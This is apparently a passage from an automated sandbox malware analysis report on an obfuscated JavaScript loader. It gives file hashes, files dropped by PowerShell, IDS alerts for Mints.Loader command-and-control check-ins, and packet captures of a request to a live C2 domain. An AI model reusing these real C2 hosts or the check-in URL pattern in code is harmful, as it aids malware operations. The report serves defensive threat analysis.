                                                                                                            leUmNO9XPu.exeGet hashmaliciousHawkEye, MailPassViewBrowse
                                                                                                            • 207.204.50.48
                                                                                                            OH6KO8NBy1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 206.188.197.24

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:@...e................................................@..........

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cetc3rln.zck.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrlqki3w.wdu.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6222
                                                                                                            Entropy (8bit):3.731333292207573
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:KxyDdCRP8aKkvhkvCCtCMKgQCHEofYKgQHHEofr:K0D0PCCMKOwK1T
                                                                                                            MD5:EB513B8049AA7E3D8E0050E2EE4FA5C4
                                                                                                            SHA1:F97FB07462A2D9A8269937C55AE8E2AD7DA690FF
                                                                                                            SHA-256:30A421AE35AC64892106EF584FFBCA202FDA039C8DF1C2248E0D5954D43FB4B5
                                                                                                            SHA-512:BD3FA57EEDD1D3829FE5CAF42167CAB67F38C06CE683936E7BA08DAB3E0AB71C42830211973EF2556B5BE66C7DAF6D3FE229E89CF17307A2007EF7BA51692A6A
                                                                                                            Malicious:false
                                                                                                            Preview:...................................FL..................F.".. ......Yd....'..)k..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....d..)k...u,.)k......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B4Z.V..........................d...A.p.p.D.a.t.a...B.V.1.....4Z.V..Roaming.@......EW)B4Z.V..........................?...R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B4Z.V............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B4Z.V..............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B4Z.V....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B4Z.V....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B4Z.V.....0..........

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KG7V0HLBYCS3JFBTBOZR.temp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6222
                                                                                                            Entropy (8bit):3.731333292207573
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:KxyDdCRP8aKkvhkvCCtCMKgQCHEofYKgQHHEofr:K0D0PCCMKOwK1T
                                                                                                            MD5:EB513B8049AA7E3D8E0050E2EE4FA5C4
                                                                                                            SHA1:F97FB07462A2D9A8269937C55AE8E2AD7DA690FF
                                                                                                            SHA-256:30A421AE35AC64892106EF584FFBCA202FDA039C8DF1C2248E0D5954D43FB4B5
                                                                                                            SHA-512:BD3FA57EEDD1D3829FE5CAF42167CAB67F38C06CE683936E7BA08DAB3E0AB71C42830211973EF2556B5BE66C7DAF6D3FE229E89CF17307A2007EF7BA51692A6A
                                                                                                            Malicious:false
                                                                                                            Preview:...................................FL..................F.".. ......Yd....'..)k..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....d..)k...u,.)k......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B4Z.V..........................d...A.p.p.D.a.t.a...B.V.1.....4Z.V..Roaming.@......EW)B4Z.V..........................?...R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B4Z.V............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B4Z.V..............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B4Z.V....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B4Z.V....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B4Z.V.....0..........

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:ASCII text, with very long lines (550)
                                                                                                            Entropy (8bit):4.427726407381041
                                                                                                            TrID:
                                                                                                            • Digital Micrograph Script (4001/1) 100.00%
                                                                                                            File name:FM5vWQHpqe.js
                                                                                                            File size:389'749 bytes
                                                                                                            MD5:c1c0e16fc76c9da7873958c89c59416d
                                                                                                            SHA1:c66661696fa8bdc6576c4b47a106a0c32518b2b9
                                                                                                            SHA256:24c03cb37e48b5810f40fdd69acb290d67dbfd003bef5c21cf23b1d210a0faa1
                                                                                                            SHA512:e4168c334b452a1b0e4c7419d56c21732388bc59166619e57e3ce823442a271b9fd80cddcd13ad806348c5ac6a19c15267c1b11d488b6a75b0b2671ca695f86e
                                                                                                            SSDEEP:3072:SX6m9v6CVX6m9v6JKcfQ6m9v/KXKRHKt6m9vJ6m9v5YXp6m9v5k6m9vs/K1YRXEv:t
                                                                                                            TLSH:AF848566A1B139366C419381BF4149F3A6FDC417521F1BA6ACAE472C060F4B9937EC3E
                                                                                                            File Content Preview:// carmen juniper inculpation solerets larrikins subdwarf iridosmines logicises rumpuses spurner eyesights rheumiest hydrate polyelectrolyte superior vacancy redargued crocine knockwurst flossed ninebarks redream tsk hypoxemic trichromats fetors cardiae./

                                                                                                            File Icon

                                                                                                            Icon Hash:68d69b8bb6aa9a86

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-20T11:55:51.369979+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.849705206.188.196.21980TCP
                                                                                                            2025-01-20T11:55:51.369979+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.2.849705206.188.196.21980TCP
                                                                                                            2025-01-20T11:55:51.369979+01002057743ET MALWARE TA582 CnC Checkin1192.168.2.849705206.188.196.21980TCP
                                                                                                            2025-01-20T11:55:52.016079+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.849706142.250.185.6880TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 20, 2025 11:55:50.168929100 CET4970580192.168.2.8206.188.196.219
                                                                                                            Jan 20, 2025 11:55:50.361489058 CET8049705206.188.196.219192.168.2.8
                                                                                                            Jan 20, 2025 11:55:50.361864090 CET4970580192.168.2.8206.188.196.219
                                                                                                            Jan 20, 2025 11:55:50.365710020 CET4970580192.168.2.8206.188.196.219
                                                                                                            Jan 20, 2025 11:55:50.370445013 CET8049705206.188.196.219192.168.2.8
                                                                                                            Jan 20, 2025 11:55:51.310861111 CET8049705206.188.196.219192.168.2.8
                                                                                                            Jan 20, 2025 11:55:51.324671984 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:51.329440117 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:51.329524994 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:51.329731941 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:51.334479094 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:51.369978905 CET4970580192.168.2.8206.188.196.219
                                                                                                            Jan 20, 2025 11:55:52.015919924 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.015945911 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.015957117 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.015968084 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.015980959 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.015990973 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.016004086 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.016015053 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.016025066 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.016036987 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.016078949 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.016129971 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.020988941 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.021003962 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.021014929 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.021075964 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.068392038 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.104273081 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104335070 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104372978 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104415894 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.104698896 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104732990 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104753971 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.104765892 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104815960 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.110992908 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.111028910 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.111047029 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.111223936 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.117429018 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.117464066 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.117495060 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.117530107 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.117573023 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.123639107 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.123672962 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.123704910 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.123756886 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.129817963 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.129848003 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.129919052 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.129921913 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.129947901 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.129975080 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.136046886 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.136081934 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.136110067 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.136115074 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.136156082 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.142273903 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.142307043 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.142338991 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.142369986 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.148504972 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.148536921 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.148562908 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.148570061 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.148603916 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.154802084 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.154834986 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.154877901 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.154887915 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.154916048 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.154967070 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.192637920 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192672014 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192688942 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192699909 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192711115 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192719936 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.192748070 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.196789980 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.196800947 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.196835041 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.196966887 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.196976900 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.197005987 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.203063965 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.203083992 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.203094959 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.203119993 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.203142881 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.209332943 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.209374905 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.209387064 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.209418058 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.215543032 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.215567112 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.215588093 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.255825043 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.586677074 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.586757898 CET4970580192.168.2.8206.188.196.219

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 20, 2025 11:55:50.133960962 CET5405953192.168.2.81.1.1.1
                                                                                                            Jan 20, 2025 11:55:50.154297113 CET53540591.1.1.1192.168.2.8
                                                                                                            Jan 20, 2025 11:55:51.312858105 CET5270053192.168.2.81.1.1.1
                                                                                                            Jan 20, 2025 11:55:51.319530964 CET53527001.1.1.1192.168.2.8

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 20, 2025 11:55:50.133960962 CET192.168.2.81.1.1.10xb848Standard query (0)nzy3tvbb72g3.topA (IP address)IN (0x0001)false
                                                                                                            Jan 20, 2025 11:55:51.312858105 CET192.168.2.81.1.1.10xf9d8Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 20, 2025 11:55:50.154297113 CET1.1.1.1192.168.2.80xb848No error (0)nzy3tvbb72g3.top206.188.196.219A (IP address)IN (0x0001)false
                                                                                                            Jan 20, 2025 11:55:51.319530964 CET1.1.1.1192.168.2.80xf9d8No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • nzy3tvbb72g3.top
                                                                                                            • www.google.com

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.849705206.188.196.219807580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 20, 2025 11:55:50.365710020 CET176OUTGET /1.php?s=mints13 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                            Host: nzy3tvbb72g3.top
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 20, 2025 11:55:51.310861111 CET166INHTTP/1.1 302 Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Mon, 20 Jan 2025 10:55:51 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://www.google.com


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.849706142.250.185.68807580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 20, 2025 11:55:51.329731941 CET159OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                            Host: www.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 20, 2025 11:55:52.015919924 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 20 Jan 2025 10:55:51 GMT
                                                                                                            Expires: -1
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-JLDd7Tyb9tGXqIsL63X3LA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Server: gws
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Set-Cookie: AEC=AZ6Zc-V9nWsmsmi2L5bsFNriJhEw3XjfRhl71bBWS2d6BUXh-AkYZFb9_-8; expires=Sat, 19-Jul-2025 10:55:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                            Set-Cookie: NID=520=lN2T2YOuyZkMCmZ3kBqmaBiGzQyKRAYjWByPc1Tt1iSJ_2_6rk5zX0Wm-n6w5fvmKDOu9HSGIl68BA1GvmPOl6Zj8n7sYovdD-uoCPFhFUyFLzuDij2E572fBnc3JknayITrT8z1E5NjczAX6k1OFK5mNPbAZ_9QpNuQkiJKEqWLgjnBpZI93tQKXKwtwl6m6mK8fd5ogCyJnP-lvg; expires=Tue, 22-Jul-2025 10:55:51 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                            Accept-Ranges: none
                                                                                                            Vary: Accept-Encoding
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Data Raw: 34 62 36 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73
                                                                                                            Data Ascii: 4b63<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages
                                                                                                            Jan 20, 2025 11:55:52.015945911 CET1236INData Raw: 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74
                                                                                                            Data Ascii: , images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta co
                                                                                                            Jan 20, 2025 11:55:52.015957117 CET448INData Raw: 2c 37 30 37 2c 34 33 35 2c 35 30 37 31 30 32 2c 33 31 35 35 39 2c 32 38 37 32 2c 32 38 39 31 2c 37 33 30 35 30 2c 31 36 31 30 35 2c 32 33 39 32 37 31 2c 31 30 35 35 32 35 2c 34 35 37 38 36 2c 39 37 37 39 2c 39 39 34 30 34 2c 33 38 30 31 2c 32 34
                                                                                                            Data Ascii: ,707,435,507102,31559,2872,2891,73050,16105,239271,105525,45786,9779,99404,3801,2412,50869,7734,28,27506,11814,30911,5230281,10474,768,8834899,14,7437949,16496230,4043709,25222751,1294,4636,16436,95685,10983,884,14280,4792,2,3387,5934,4559,389
                                                                                                            Jan 20, 2025 11:55:52.015968084 CET1236INData Raw: 39 35 2c 37 35 36 39 2c 34 37 35 2c 31 2c 31 37 32 30 2c 32 36 33 39 2c 35 31 36 2c 31 38 36 36 2c 37 32 36 2c 33 2c 33 33 37 36 2c 33 30 36 2c 38 30 33 39 2c 31 39 38 39 2c 31 38 30 30 2c 31 33 31 35 2c 34 30 2c 31 34 35 31 2c 33 36 36 35 2c 31
                                                                                                            Data Ascii: 95,7569,475,1,1720,2639,516,1866,726,3,3376,306,8039,1989,1800,1315,40,1451,3665,1541,4957,951,628,299,1222,758,3849,7,5112,661,1792,840,1,1678,1462,864,1308,2,738,4378,730,1116,120,162,2,1459,750,17,461,2030,91,4550,2003,1058,542,283,2,84,772
                                                                                                            Jan 20, 2025 11:55:52.015980959 CET1236INData Raw: 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7c 7c 6c 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 75 6c 6c 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c
                                                                                                            Data Ascii: ")));)a=a.parentNode;return b||l}function p(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function q(a){/^http:/i.test(a)&&window.location.protocol==="https:"&&(google.ml&&google.ml(Error("a"),!1,
                                                                                                            Jan 20, 2025 11:55:52.015990973 CET1236INData Raw: 29 7d 29 3b 67 6f 6f 67 6c 65 2e 6c 71 3d 5b 5d 3b 76 61 72 20 67 3b 28 67 3d 67 6f 6f 67 6c 65 29 2e 6c 6f 61 64 7c 7c 28 67 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 5b 61
                                                                                                            Data Ascii: )});google.lq=[];var g;(g=google).load||(g.load=function(a,b,c){google.lq.push([[a],b,c])});var h;(h=google).loadAll||(h.loadAll=function(a,b){google.lq.push([a,b])});google.bx=!1;var k;(k=google).lx||(k.lx=function(){});var l=[],m;(m=google).
                                                                                                            Jan 20, 2025 11:55:52.016004086 CET1236INData Raw: 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 33 38 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 66 6f 6e 74
                                                                                                            Data Ascii: und-position:0 -138px;background-repeat:repeat-x;border-bottom:1px solid #000;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:r
